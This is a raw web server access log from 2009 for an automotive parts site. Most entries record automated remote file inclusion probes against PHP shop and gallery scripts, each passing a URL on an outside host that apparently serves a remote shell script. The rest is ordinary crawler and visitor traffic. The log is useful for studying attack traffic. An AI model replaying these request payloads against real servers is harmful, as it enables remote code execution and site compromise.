219.94.174.158 - - [03/Feb/2009:13:49:05 -0800] "GET /logs/index.phpoption=com_easygallery&Itemid=&mosConfig_absolute_path=http://laloggia.by.ru/up/ctrl.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.bluestarperformance.com"
208.115.111.244 - - [03/Feb/2009:13:49:12 -0800] "GET /gallery2.htm HTTP/1.1" 200 11472 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "bodyworks.bluestarperformance.com"
150.101.216.60 - - [03/Feb/2009:13:53:31 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://laloggia.by.ru/up/ctrl.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.bluestarperformance.com"
150.101.216.60 - - [03/Feb/2009:13:53:31 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://laloggia.by.ru/up/ctrl.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.bluestarperformance.com"
80.25.82.126 - - [03/Feb/2009:13:55:00 -0800] "GET /logs/access_081202.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://canalteresina.org/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bluestarperformance.com"
80.25.82.126 - - [03/Feb/2009:13:55:00 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://canalteresina.org/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bluestarperformance.com"
80.25.82.126 - - [03/Feb/2009:13:55:00 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://canalteresina.org/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bluestarperformance.com"
77.221.130.2 - - [03/Feb/2009:13:57:20 -0800] "GET /logs/access_081202.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.lazar.ru/manager/processors/ident.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bluestarperformance.com"
77.221.130.2 - - [03/Feb/2009:13:57:21 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.lazar.ru/manager/processors/ident.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bluestarperformance.com"
77.221.130.2 - - [03/Feb/2009:13:57:25 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.lazar.ru/manager/processors/ident.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bluestarperformance.com"
207.213.245.215 - - [03/Feb/2009:13:58:34 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hkcchoir.org.hk///upload/prety/lshell.xpp? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bluestarperformance.com"
69.64.67.117 - - [03/Feb/2009:14:00:53 -0800] "GET /logs/access_081202.log//skin_shop/standard/TnT_gs_view_menu//body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://nicheempiregraphics.com/amember/member.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bluestarperformance.com"
69.64.67.117 - - [03/Feb/2009:14:00:54 -0800] "GET /skin_shop/standard/TnT_gs_view_menu//body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://nicheempiregraphics.com/amember/member.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bluestarperformance.com"
69.64.67.117 - - [03/Feb/2009:14:00:54 -0800] "GET /logs//skin_shop/standard/TnT_gs_view_menu//body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://nicheempiregraphics.com/amember/member.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bluestarperformance.com"
213.24.217.228 - - [03/Feb/2009:14:00:56 -0800] "GET /logs/access_081202.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.rothschildfamilytree.com/addmin.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bluestarperformance.com"
213.24.217.228 - - [03/Feb/2009:14:00:56 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.rothschildfamilytree.com/addmin.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bluestarperformance.com"
213.24.217.228 - - [03/Feb/2009:14:00:56 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.rothschildfamilytree.com/addmin.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bluestarperformance.com"
217.196.64.12 - - [03/Feb/2009:14:03:18 -0800] "GET /logs/access_081202.log//skin_shop/standard/TnT_gs_view_menu//body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.lethbridgeminorfootball.ab.ca/images/.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bluestarperformance.com"
217.196.64.12 - - [03/Feb/2009:14:03:19 -0800] "GET /skin_shop/standard/TnT_gs_view_menu//body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.lethbridgeminorfootball.ab.ca/images/.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bluestarperformance.com"
217.196.64.12 - - [03/Feb/2009:14:03:20 -0800] "GET /logs//skin_shop/standard/TnT_gs_view_menu//body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.lethbridgeminorfootball.ab.ca/images/.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bluestarperformance.com"
83.172.140.17 - - [03/Feb/2009:14:03:55 -0800] "GET /logs/access_081202.log//skin_shop/standard/TnT_gs_view_menu//body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://swedish-host.com//form/forms/forms.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bluestarperformance.com"
83.172.140.17 - - [03/Feb/2009:14:03:55 -0800] "GET /skin_shop/standard/TnT_gs_view_menu//body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://swedish-host.com//form/forms/forms.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bluestarperformance.com"
83.172.140.17 - - [03/Feb/2009:14:03:55 -0800] "GET /logs//skin_shop/standard/TnT_gs_view_menu//body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://swedish-host.com//form/forms/forms.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bluestarperformance.com"
83.172.140.17 - - [03/Feb/2009:14:04:33 -0800] "GET /logs/access_081202.log//skin_shop/standard/TnT_gs_view_menu//body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://jtechonline.co.uk/images/form.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bluestarperformance.com"
83.172.140.17 - - [03/Feb/2009:14:04:33 -0800] "GET /skin_shop/standard/TnT_gs_view_menu//body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://jtechonline.co.uk/images/form.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bluestarperformance.com"
83.172.140.17 - - [03/Feb/2009:14:04:33 -0800] "GET /logs//skin_shop/standard/TnT_gs_view_menu//body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://jtechonline.co.uk/images/form.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bluestarperformance.com"
89.108.67.188 - - [03/Feb/2009:14:08:30 -0800] "GET /logs/access_081202.log//skin_shop/standard/TnT_gs_view_menu//body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://nicheempiregraphics.com/amember/member.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.bluestarperformance.com"
89.108.67.188 - - [03/Feb/2009:14:08:30 -0800] "GET /skin_shop/standard/TnT_gs_view_menu//body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://nicheempiregraphics.com/amember/member.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.bluestarperformance.com"
89.108.67.188 - - [03/Feb/2009:14:08:31 -0800] "GET /logs//skin_shop/standard/TnT_gs_view_menu//body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://nicheempiregraphics.com/amember/member.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.bluestarperformance.com"
66.103.131.81 - - [03/Feb/2009:14:10:44 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://laloggia.by.ru/up/ctrl.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.bluestarperformance.com"
66.103.131.81 - - [03/Feb/2009:14:10:44 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://laloggia.by.ru/up/ctrl.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.bluestarperformance.com"
66.249.72.77 - - [03/Feb/2009:14:12:57 -0800] "GET /images/3386B_web.jpg HTTP/1.1" 200 99382 "-" "Googlebot-Image/1.0" "bluestarperformance.com"
219.94.174.158 - - [03/Feb/2009:14:15:08 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://laloggia.by.ru/up/ctrl.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.bluestarperformance.com"
219.94.174.158 - - [03/Feb/2009:14:15:08 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://laloggia.by.ru/up/ctrl.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.bluestarperformance.com"
207.213.245.215 - - [03/Feb/2009:14:21:53 -0800] "GET /logs/access_081202.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hkcchoir.org.hk///upload/prety/lshell.xpp? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bluestarperformance.com"
207.213.245.215 - - [03/Feb/2009:14:21:53 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hkcchoir.org.hk///upload/prety/lshell.xpp? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bluestarperformance.com"
69.64.67.117 - - [03/Feb/2009:14:36:56 -0800] "GET /logs/access_081202.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://nicheempiregraphics.com/amember/member.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bluestarperformance.com"
69.64.67.117 - - [03/Feb/2009:14:36:56 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://nicheempiregraphics.com/amember/member.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bluestarperformance.com"
69.64.67.117 - - [03/Feb/2009:14:36:56 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://nicheempiregraphics.com/amember/member.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bluestarperformance.com"
217.196.64.12 - - [03/Feb/2009:14:38:54 -0800] "GET /logs/access_081202.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.lethbridgeminorfootball.ab.ca/images/.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bluestarperformance.com"
217.196.64.12 - - [03/Feb/2009:14:38:54 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.lethbridgeminorfootball.ab.ca/images/.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bluestarperformance.com"
217.196.64.12 - - [03/Feb/2009:14:38:54 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.lethbridgeminorfootball.ab.ca/images/.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bluestarperformance.com"
83.172.140.17 - - [03/Feb/2009:14:39:41 -0800] "GET /logs/access_081202.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://swedish-host.com//form/forms/forms.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bluestarperformance.com"
83.172.140.17 - - [03/Feb/2009:14:39:41 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://swedish-host.com//form/forms/forms.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bluestarperformance.com"
83.172.140.17 - - [03/Feb/2009:14:39:41 -0800] "GET /logs/access_081202.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://jtechonline.co.uk/images/form.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bluestarperformance.com"
83.172.140.17 - - [03/Feb/2009:14:39:42 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://swedish-host.com//form/forms/forms.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bluestarperformance.com"
83.172.140.17 - - [03/Feb/2009:14:39:42 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://jtechonline.co.uk/images/form.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bluestarperformance.com"
83.172.140.17 - - [03/Feb/2009:14:39:42 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://jtechonline.co.uk/images/form.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bluestarperformance.com"
89.108.67.188 - - [03/Feb/2009:14:43:47 -0800] "GET /logs/access_081202.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://nicheempiregraphics.com/amember/member.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.bluestarperformance.com"
89.108.67.188 - - [03/Feb/2009:14:43:48 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://nicheempiregraphics.com/amember/member.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.bluestarperformance.com"
89.108.67.188 - - [03/Feb/2009:14:43:48 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://nicheempiregraphics.com/amember/member.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.bluestarperformance.com"
116.127.121.39 - - [03/Feb/2009:14:46:42 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://roadone.net//board//data/photo/db/z6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bluestarperformance.com"
116.127.121.39 - - [03/Feb/2009:14:46:42 -0800] "GET /logs/access_081202.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://roadone.net//board//data/photo/db/z6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bluestarperformance.com"
116.127.121.39 - - [03/Feb/2009:14:46:42 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://roadone.net//board//data/photo/db/z6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bluestarperformance.com"
116.127.121.39 - - [03/Feb/2009:14:47:50 -0800] "GET /logs/access_081202.log%20//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://roadone.net//board//data/photo/db/z6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bluestarperformance.com"
72.30.142.187 - - [03/Feb/2009:14:51:15 -0800] "GET /amd-ordering.html HTTP/1.0" 200 21581 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.bluestarperformance.com"
69.16.205.212 - - [03/Feb/2009:14:52:13 -0800] "GET /index.php?form=http://laloggia.by.ru/up/ctrl.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.bluestarperformance.com"
69.16.205.212 - - [03/Feb/2009:14:52:13 -0800] "GET /logs/index.php?form=http://laloggia.by.ru/up/ctrl.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.bluestarperformance.com"
211.75.29.70 - - [03/Feb/2009:14:54:08 -0800] "GET /logs/access_081202.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://canalteresina.org/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bluestarperformance.com"
211.75.29.70 - - [03/Feb/2009:14:54:10 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://canalteresina.org/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bluestarperformance.com"
211.75.29.70 - - [03/Feb/2009:14:54:11 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://canalteresina.org/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bluestarperformance.com"
66.249.72.77 - - [03/Feb/2009:15:00:53 -0800] "GET /images/3515_web.jpg HTTP/1.1" 200 28733 "-" "Googlebot-Image/1.0" "bluestarperformance.com"
64.135.219.16 - - [03/Feb/2009:15:02:51 -0800] "GET / HTTP/1.1" 200 21950 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; MS-RTC LM 8)" "www.bluestarperformance.com"
64.135.219.16 - - [03/Feb/2009:15:02:52 -0800] "GET /images/blackHeader2.jpg HTTP/1.1" 200 3786 "http://www.bluestarperformance.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; MS-RTC LM 8)" "bluestarperformance.com"
64.135.219.16 - - [03/Feb/2009:15:02:52 -0800] "GET /images/spacer.gif HTTP/1.1" 200 43 "http://www.bluestarperformance.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; MS-RTC LM 8)" "bluestarperformance.com"
64.135.219.16 - - [03/Feb/2009:15:02:52 -0800] "GET /images/subBannerB.jpg HTTP/1.1" 200 3727 "http://www.bluestarperformance.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; MS-RTC LM 8)" "bluestarperformance.com"
64.135.219.16 - - [03/Feb/2009:15:02:52 -0800] "GET /images/bsplogo2.jpg HTTP/1.1" 200 13014 "http://www.bluestarperformance.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; MS-RTC LM 8)" "bluestarperformance.com"
64.135.219.16 - - [03/Feb/2009:15:02:52 -0800] "GET /images/blackFiller.jpg HTTP/1.1" 200 1548 "http://www.bluestarperformance.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; MS-RTC LM 8)" "bluestarperformance.com"
64.135.219.16 - - [03/Feb/2009:15:02:53 -0800] "GET /images/TEXTback.jpg HTTP/1.1" 200 5487 "http://www.bluestarperformance.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; MS-RTC LM 8)" "bluestarperformance.com"
64.135.219.16 - - [03/Feb/2009:15:02:53 -0800] "GET /images/blackbutton.jpg HTTP/1.1" 200 622 "http://www.bluestarperformance.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; MS-RTC LM 8)" "bluestarperformance.com"
64.135.219.16 - - [03/Feb/2009:15:02:53 -0800] "GET /images/searchBKGND.gif HTTP/1.1" 200 1605 "http://www.bluestarperformance.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; MS-RTC LM 8)" "bluestarperformance.com"
64.135.219.16 - - [03/Feb/2009:15:02:53 -0800] "GET /slideshows/69rr.jpg HTTP/1.1" 200 13534 "http://www.bluestarperformance.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; MS-RTC LM 8)" "bluestarperformance.com"
64.135.219.16 - - [03/Feb/2009:15:02:53 -0800] "GET /slideshows/69rr2.jpg HTTP/1.1" 200 16079 "http://www.bluestarperformance.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; MS-RTC LM 8)" "bluestarperformance.com"
64.135.219.16 - - [03/Feb/2009:15:02:53 -0800] "GET /slideshows/70chall.jpg HTTP/1.1" 200 12934 "http://www.bluestarperformance.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; MS-RTC LM 8)" "bluestarperformance.com"
64.135.219.16 - - [03/Feb/2009:15:02:53 -0800] "GET /slideshows/70chall2.jpg HTTP/1.1" 200 18303 "http://www.bluestarperformance.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; MS-RTC LM 8)" "bluestarperformance.com"
64.135.219.16 - - [03/Feb/2009:15:02:53 -0800] "GET /slideshows/IMG_0270.jpg HTTP/1.1" 200 26693 "http://www.bluestarperformance.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; MS-RTC LM 8)" "bluestarperformance.com"
64.135.219.16 - - [03/Feb/2009:15:02:53 -0800] "GET /slideshows/chal-ta.jpg HTTP/1.1" 200 14967 "http://www.bluestarperformance.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; MS-RTC LM 8)" "bluestarperformance.com"
64.135.219.16 - - [03/Feb/2009:15:02:54 -0800] "GET /images/bluestar-banner.jpg HTTP/1.1" 200 23108 "http://www.bluestarperformance.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; MS-RTC LM 8)" "bluestarperformance.com"
64.135.219.16 - - [03/Feb/2009:15:02:54 -0800] "GET /images/blackHeader.jpg HTTP/1.1" 200 1964 "http://www.bluestarperformance.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; MS-RTC LM 8)" "bluestarperformance.com"
64.135.219.16 - - [03/Feb/2009:15:02:54 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; MS-RTC LM 8)" "bluestarperformance.com"
64.135.219.16 - - [03/Feb/2009:15:03:26 -0800] "GET /parts4sale.html HTTP/1.1" 200 15299 "http://www.bluestarperformance.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; MS-RTC LM 8)" "www.bluestarperformance.com"
64.135.219.16 - - [03/Feb/2009:15:03:30 -0800] "GET /amd.html HTTP/1.1" 200 15840 "http://www.bluestarperformance.com/parts4sale.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; MS-RTC LM 8)" "www.bluestarperformance.com"
